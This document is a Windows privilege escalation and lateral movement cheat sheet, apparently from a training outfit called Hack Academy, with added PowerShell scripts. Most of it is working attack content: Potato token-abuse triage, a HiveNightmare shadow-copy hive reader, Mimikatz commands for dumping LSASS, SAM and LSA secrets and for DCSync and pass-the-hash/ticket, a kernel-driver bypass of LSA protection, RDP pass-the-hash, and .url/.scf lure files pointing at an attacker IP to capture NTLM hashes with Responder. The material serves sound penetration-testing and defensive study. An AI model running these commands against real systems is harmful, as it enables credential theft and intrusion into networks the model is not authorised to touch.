
LOCAL PRIVILEGE ESCALATION

CHEAT SHEET
By Hack Academy
Table of Contents

• Privilege Escalation Techniques
  • Token Privilege Abuse
  • SMB and File Privilege Exploits
  • Privilege Escalation Tools
• Lateral Movement
  • PowerShell Remoting
  • Mimikatz
  • Bypassing LSASS Protections
  • LSA As A Protected Process (Kernel-Land Bypass)
  • Remote Desktop Protocol (RDP)
• Other Techniques
  • URL File Attacks
  • Notes on .scf File Attacks
  • Useful Tools for Attacks
• Outro


Introduction

Welcome to the Windows Local Privilege Escalation Cheat Sheet, your go-to guide for
navigating the tricky terrain of Windows privilege escalation and lateral movement.
Whether you're a penetration tester or a cybersecurity enthusiast, this document
organizes essential techniques, tools, and commands into a clear and structured format -
complete with detailed steps and compatibility notes. Tackle privilege escalation with
precision and confidence!

Privilege Escalation Techniques

Token Privilege Abuse

Technique | Description | Compatibility
Juicy Potato | Abuses SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege (typically held by service accounts such as IIS or MSSQL) to obtain a SYSTEM token through a local DCOM/NTLM reflection; needs a CLSID that works on the target build. | Up to Windows Server 2016 / Windows 10 1803 (the reflection path was closed in 1809)
Lovely Potato | Automated Juicy Potato implementation that scripts the CLSID testing. | Same as Juicy Potato
PrintSpoofer | Abuses the Print Spooler service (the PrinterBug named-pipe trick) to impersonate SYSTEM; needs SeImpersonatePrivilege and a running Spooler service. | Windows Server 2019 / Windows 10 1809 and later
RoguePotato | Successor to Juicy Potato for patched builds; needs a redirector (attacker host or local socat) so the OXID resolver request on TCP/135 reaches the attacker's listener. | Windows Server 2019 / Windows 10 1809 and later

All four require SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege in the current token; check with whoami /priv before picking a technique.
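The triage that precedes the table above, written out as an added PowerShell example (not part of the Hack Academy sheet): parse whoami /priv for the two token privileges, read the OS build, and map the result onto the Potato family. The build threshold 17763 (Windows 10 1809 / Server 2019) is where Juicy Potato stopped working; the Spooler service check is the PrintSpoofer prerequisite. The parameters exist only so the logic can be fed canned input.

```powershell
# Added example, not from the original cheat sheet. Thresholds: build 17763 is
# Windows 10 1809 / Server 2019, where the JuicyPotato reflection path was closed;
# Windows 10 1803 is build 17134 and Server 2016 is 14393.
function Get-TokenPrivilegeTriage {
    [CmdletBinding()]
    param(
        # Both default to the live host; pass saved 'whoami /priv' output and a
        # build number to run the decision logic against another machine's data.
        [string[]]$WhoamiPriv = (whoami /priv),
        [int]$Build = [int](Get-CimInstance -ClassName Win32_OperatingSystem).BuildNumber
    )

    # whoami /priv rows look like "SeImpersonatePrivilege  Impersonate a client ...  Enabled".
    # A Disabled privilege is still held (the process can enable it), so both states count.
    $held = foreach ($line in $WhoamiPriv) {
        if ($line -match '^(Se\w+Privilege)\s+.*\s+(Enabled|Disabled)\s*$') { $Matches[1] }
    }

    $impersonate = $held -contains 'SeImpersonatePrivilege'
    $assignToken = $held -contains 'SeAssignPrimaryTokenPrivilege'
    $spooler     = Get-Service -Name Spooler -ErrorAction SilentlyContinue

    $result = [ordered]@{
        Build                   = $Build
        HasSeImpersonate        = $impersonate
        HasSeAssignPrimaryToken = $assignToken
        SpoolerRunning          = [bool]($spooler -and $spooler.Status -eq 'Running')
        Candidates              = @()
    }

    if (-not ($impersonate -or $assignToken)) {
        # No token privilege to abuse: fall back to misconfiguration hunting (PowerUp, BeRoot).
        $result.Candidates = @('None from the Potato family; enumerate misconfigurations instead')
        return [pscustomobject]$result
    }

    if ($Build -lt 17763) {
        $result.Candidates += 'JuicyPotato / LovelyPotato (pre-1809 build)'
    }
    # RoguePotato does not depend on the Spooler, only on a reachable OXID redirector.
    $result.Candidates += 'RoguePotato (needs a redirector to your host on TCP/135)'
    if ($result.SpoolerRunning) {
        $result.Candidates += 'PrintSpoofer (Spooler named-pipe impersonation)'
    }
    [pscustomobject]$result
}

Get-TokenPrivilegeTriage | Format-List
```

Run it from the low-privileged shell you actually hold, not from an elevated console, since the privilege list is that of the calling process.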

SMB and File Privilege Exploits

Exploit | Description | Reference
SMBGhost (CVE-2020-0796) | Integer overflow in the SMBv3.1.1 compression handling of srv2.sys on Windows 10 1903/1909; public PoCs use it locally for a SYSTEM shell, and remote exploitation is possible against unpatched hosts. | PoC available
HiveNightmare (CVE-2021-36934) | Overly permissive ACLs (BUILTIN\Users granted read) on the SAM, SYSTEM and SECURITY hives under %windir%\System32\config let any local user read copies of them from Volume Shadow Copies, yielding local NT hashes and the LSA secrets. | aka SeriousSAM
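An added check for the HiveNightmare row (example code, not from the sheet): confirm the weak ACL on the live hives, then try to open the hive copies inside shadow copies as the current user, which is the actual read path because the live files are locked. The \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\ path form is the one the public PoCs use; the index range 1..15 is an assumption, since listing shadow copies with vssadmin needs admin.

```powershell
# Added example, not from the original cheat sheet. Tests CVE-2021-36934 exposure
# from an unprivileged context: ACL on the live hives plus a read attempt on the
# shadow-copy hives. Assumes shadow copy indices 1..$MaxShadowIndex are worth probing.
function Test-HiveNightmare {
    [CmdletBinding()]
    param([int]$MaxShadowIndex = 15)

    $hives  = 'SAM', 'SYSTEM', 'SECURITY'
    $config = Join-Path $env:SystemRoot 'System32\config'
    $usersSid = 'S-1-5-32-545'   # BUILTIN\Users, compared by SID so locale does not matter

    # 1. ACL check: an Allow ACE for Users carrying ReadData (bit 0x1) is the vulnerable state.
    $aclExposed = foreach ($h in $hives) {
        try {
            $acl = Get-Acl -Path (Join-Path $config $h)
            foreach ($ace in $acl.Access) {
                $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
                if ($sid -eq $usersSid -and $ace.AccessControlType -eq 'Allow' -and
                    (([int]$ace.FileSystemRights) -band 1) -ne 0) { $h }
            }
        } catch { }   # patched hosts may deny even READ_CONTROL to non-admins
    }

    # 2. Read check: the live hive is locked, but the shadow-copy hive is a plain readable file
    #    when the ACL is weak. Unused indices fail with "not found", fixed hosts with "denied".
    $readable = foreach ($i in 1..$MaxShadowIndex) {
        foreach ($h in $hives) {
            $p = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$i\Windows\System32\config\$h"
            try {
                $fs = [System.IO.File]::OpenRead($p)
                $fs.Dispose()
                $p
            } catch { }
        }
    }

    [pscustomobject]@{
        UsersCanReadLiveHiveAcl = @($aclExposed | Sort-Object -Unique)
        ReadableShadowCopies    = @($readable)
        Vulnerable              = [bool]$readable
    }
}

Test-HiveNightmare | Format-List

# Remediation (Microsoft's KB5005357 workaround, needs admin): restore inheritance on the
# hives and delete existing shadow copies, otherwise older readable copies remain.
#   icacls %windir%\system32\config\*.* /inheritance:e
#   vssadmin delete shadows /for=C: /quiet
```

A host can show the weak ACL but no readable shadow copy (System Protection off, or copies already purged); only the second condition gives an attacker the hives.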

Privilege Escalation Tools

Tool | Description
PowerUp | PowerSploit module that enumerates and exploits common misconfigurations (unquoted service paths, writable service binaries, AlwaysInstallElevated, modifiable autoruns); Invoke-AllChecks runs every check.
BeRoot | General LPE enumeration tool (Python, also shipped as a compiled binary).
Privesc | Alternative PowerShell enumeration script.
FullPowers | Recovers the default privilege set of a LOCAL SERVICE or NETWORK SERVICE account (notably SeImpersonatePrivilege) when it has been stripped, which puts the Potato family back in play.

Lateral Movement

PowerShell Remoting

Task | Command
Enable PowerShell Remoting (run on the target; needs admin) | Enable-PSRemoting -Force
Start a PSSession | $sess = New-PSSession -ComputerName <host> -Credential $Cred
Enter a PSSession (interactive) | Enter-PSSession -ComputerName <host> -Credential $Cred  or  Enter-PSSession -Session $sess
Remote command execution | Invoke-Command -ComputerName <host> -Credential $Cred -ScriptBlock { whoami }
Import a PowerShell script/module into the session, then call it | Invoke-Command -Session $sess -FilePath <script.ps1>  followed by  Invoke-Command -Session $sess -ScriptBlock { <Function-Name> }

Invoke-Command takes either -ComputerName (with -Credential) or -Session, never both. Remoting needs WinRM reachable (TCP 5985, or 5986 for HTTPS) and an account in the target's Administrators or Remote Management Users group.
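The remoting rows above as one end-to-end sequence, added here as example code (not from the sheet). Host name, account, script path and the function name Invoke-Enum are placeholders. The point it demonstrates is that state loaded with -FilePath lives in the session object, so later calls must reference -Session rather than -ComputerName.

```powershell
# Added example, not from the original cheat sheet. All names below are assumed:
# the target host, the account, the script path and the function it defines.
$target = 'WS01.corp.local'
$cred   = Get-Credential -UserName 'CORP\svc_deploy' -Message 'Account with admin rights on the target'

# 1. Open a session. Default authentication is Negotiate (Kerberos, falling back to NTLM).
$sess = New-PSSession -ComputerName $target -Credential $cred -ErrorAction Stop

try {
    # 2. Context check inside the remote runspace.
    Invoke-Command -Session $sess -ScriptBlock { whoami; hostname }

    # 3. Ship a local .ps1 into the remote runspace. -FilePath reads the file locally and
    #    runs its contents remotely; functions it defines stay defined in $sess.
    Invoke-Command -Session $sess -FilePath 'C:\tools\Invoke-Enum.ps1'

    # 4. Call a function from that script in a separate round trip. This only works with
    #    -Session; a fresh -ComputerName invocation would not have the function.
    $out = Invoke-Command -Session $sess -ScriptBlock { Invoke-Enum }

    # 5. For an interactive prompt in the same runspace: Enter-PSSession -Session $sess
    #    (Exit-PSSession returns to the local shell without closing the session).
}
finally {
    # 6. Tear down. Orphaned sessions show up as wsmprovhost.exe on the target and in
    #    Get-PSSession on the operator host, both of which defenders look for.
    Remove-PSSession -Session $sess
}

$out
```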

Mimikatz

Task | Command
Dump logon credentials from LSASS (elevated context; run privilege::debug first) | sekurlsa::logonpasswords
Over-Pass-the-Hash: spawn a process whose Kerberos identity is derived from the NT hash | sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash> /run:<command>
List Kerberos tickets held by LSASS | sekurlsa::tickets  (add /export to write .kirbi files)
Parse an LSASS minidump offline (create it first, e.g. procdump -accepteula -ma lsass.exe c:\temp\lsass.dmp, or Task Manager > Create dump file) | sekurlsa::minidump c:\temp\lsass.dmp  followed by  sekurlsa::logonpasswords
Dump the local SAM (NT hashes of local accounts) | lsadump::sam
Dump LSA secrets (service account passwords, machine account secret, DPAPI keys) | lsadump::secrets
DCSync: pull an account's secrets from a domain controller via replication (needs replication rights, normally Domain Admins) | lsadump::dcsync /domain:<domain> /user:<account> /history
List the current session's Kerberos tickets and export them as .kirbi | kerberos::list /export
Pass-the-Ticket: inject a .kirbi into the current logon session | kerberos::ptt <ticket.kirbi>

Bypassing LSASS Protections

LSA As A Protected Process (Kernel-Land Bypass)

Step | Command
Check whether LSA Protection is enabled (RunAsPPL: 1 = on, 2 = on with UEFI lock, missing or 0 = off) | reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL
Load the mimikatz kernel driver (mimidrv.sys; needs admin, installs a kernel service and is noisy) | mimikatz # !+
Remove the protection flags from lsass.exe | mimikatz # !processprotect /process:lsass.exe /remove
Dump LSASS after the bypass | mimikatz # privilege::debug  then  mimikatz # sekurlsa::logonpasswords
Unload the driver when done | mimikatz # !-

If Credential Guard is running, LSASS no longer holds the domain secrets at all, and removing PPL does not bring them back.

Remote Desktop Protocol (RDP)

Technique | Description | Command
Pass-the-Hash via Restricted Admin | Open an RDP session with the NT hash instead of the password. Works only when Restricted Admin mode is enabled on the target (DisableRestrictedAdmin = 0 under HKLM\SYSTEM\CurrentControlSet\Control\Lsa); the resulting session authenticates to other hosts as the machine account, not as the user. | sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash> /run:"mstsc.exe /restrictedadmin"
Bypass single-session restriction | Allow more than one concurrent session per user, so connecting as an account that is already logged on does not disconnect the legitimate user. | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
Reinstate single-session restriction | Remove the setting after use. This is only correct if the value was absent before; if it was explicitly set (for example to 1 by Group Policy), write the previous value back instead. | REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUser /f

The Policies key is the Group Policy location, so a domain policy refresh can overwrite the change.
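The two RDP prerequisites above, checked and handled in PowerShell as an added example (not from the sheet): whether Restricted Admin mode is on for the pass-the-hash row, and a set/restore pair for fSingleSessionPerUser that records the prior state so cleanup puts back exactly what was there, rather than always deleting the value.

```powershell
# Added example, not from the original cheat sheet.
$tsPolicy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services'
$lsaKey   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

function Test-RestrictedAdminEnabled {
    # Restricted Admin mode is active only when DisableRestrictedAdmin exists and is 0.
    # A missing value means disabled, which has been the default since the 2014 update.
    $v = (Get-ItemProperty -Path $lsaKey -Name DisableRestrictedAdmin -ErrorAction SilentlyContinue).DisableRestrictedAdmin
    return ($null -ne $v -and [int]$v -eq 0)
}

function Set-SingleSessionPerUser {
    # Returns the previous value ($null when the value did not exist) for later restore.
    param([Parameter(Mandatory)][ValidateSet(0, 1)][int]$Value)
    if (-not (Test-Path $tsPolicy)) { New-Item -Path $tsPolicy -Force | Out-Null }
    $before = (Get-ItemProperty -Path $tsPolicy -Name fSingleSessionPerUser -ErrorAction SilentlyContinue).fSingleSessionPerUser
    Set-ItemProperty -Path $tsPolicy -Name fSingleSessionPerUser -Value $Value -Type DWord
    return $before
}

function Restore-SingleSessionPerUser {
    param($Previous)
    if ($null -eq $Previous) {
        # Nothing was configured before: deleting is the faithful restore (matches the REG DELETE row).
        Remove-ItemProperty -Path $tsPolicy -Name fSingleSessionPerUser -ErrorAction SilentlyContinue
    } else {
        # An admin had set it explicitly: write that value back instead of deleting it.
        Set-ItemProperty -Path $tsPolicy -Name fSingleSessionPerUser -Value ([int]$Previous) -Type DWord
    }
}

"Restricted Admin enabled on this host: $(Test-RestrictedAdminEnabled)"

$prev = Set-SingleSessionPerUser -Value 0     # allow a second session for the same user
try {
    # ... RDP work happens here ...
}
finally {
    Restore-SingleSessionPerUser -Previous $prev
}
```

Both functions need an elevated shell, since HKLM policy keys are not writable by standard users.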

Other Techniques

URL File Attacks

.url file (Explorer resolves IconFile over SMB while rendering the folder, so no click is needed):

[InternetShortcut]
URL=file://<attacker-ip>/share/lure
IconFile=\\<attacker-ip>\share\icon.ico
IconIndex=1

.scf file:

[Shell]
Command=2
IconFile=\\<attacker-ip>\Share\test.ico
[Taskbar]
Command=ToggleDesktop

Notes on .scf File Attacks

The .scf variant no longer works on current Windows versions, which stopped fetching SCF icons from remote shares; the .url variant and the other formats NTLM_Theft generates remain usable.

Start Responder on the attacker host (Responder -I <interface>) before placing the file on a share the victims browse. Each connecting client sends a Net-NTLMv2 response, which can be cracked offline (hashcat mode 5600) or relayed with ntlmrelayx to hosts where SMB signing is not enforced; it is not the NT hash itself, so it cannot be used directly for pass-the-hash.

Useful Tools for Attacks

Tool | Description
Powercat | Netcat in PowerShell; supports tunneling, relaying and port forwarding.
SCShell | Fileless lateral movement: changes an existing service's binary path over the remote Service Control Manager with ChangeServiceConfigA, runs the command, then restores the original path; no binary is dropped and no new service is created.
Evil-WinRM | WinRM shell for pentesting with in-memory script loading, file upload/download and pass-the-hash support.
RunasCs | Open-source runas.exe replacement that accepts the password on the command line and works from non-interactive shells (no desktop session required).
NTLM_Theft | Generates lure files in many formats (.url, .scf, .lnk, Office documents and more) that force an outbound NTLM authentication for capture with Responder.

Outro

Mastering privilege escalation is a vital skill in ethical hacking, but always remember to
operate within legal and ethical boundaries. This cheat sheet provides a streamlined
overview to help you efficiently identify and exploit vulnerabilities for educational and
authorized purposes. Happy hacking, and may your exploits be effective and your
engagements fruitful!
